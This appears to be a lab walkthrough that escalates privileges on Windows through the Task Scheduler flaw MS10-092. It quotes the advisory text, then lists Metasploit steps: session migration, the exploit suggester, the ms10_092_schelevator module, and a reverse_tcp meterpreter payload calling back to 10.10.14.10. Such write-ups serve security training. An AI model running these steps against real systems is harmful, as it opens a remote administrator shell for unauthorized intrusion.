The vulnerability could allow elevation of privilege if an attacker logged on to an affected system and ran a specially crafted application.
The Windows Task Scheduler in Microsoft Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 does not properly determine the security context of scheduled tasks, which allows local users to gain privileges via a crafted application, aka “Task Scheduler Vulnerability.” NOTE: this might overlap CVE-2010-3888
1. First confirm the meterpreter session matches the system architecture.
Both show x64. In case that it mismatches it is recommended to migrate to a new process
2. Migrate to one that shows the architecture desired, recommended to migrate to the process that has Session other than 0
- migrate 1152
3. run post/multi/recon/local_exploit_suggester
This output shows that this machine is vulnerable to ms10_092_schelevator
4. Set this meterpreter session to background and search for that exploit module
- use exploit/windows/local/ms10_092_schelevator
- show options
This exploit asks for current session, set it and then set the type of payload needed
5. find out about current sessions
- sessions -i
6. set payload windows/meterpreter/reverse_tcp
- set LHOST 10.10.14.10
- show options
7. Having already the parameters set run the exploit
A new meterpreter session has been opened.
8. Check current user after running the exploit.
9. access the shell being administrator
Fix command issue:
I did encounter an issue, only few commands were loaded so I had to load stdapi module, it brought all the commands.
- load stdapi
Apply security updates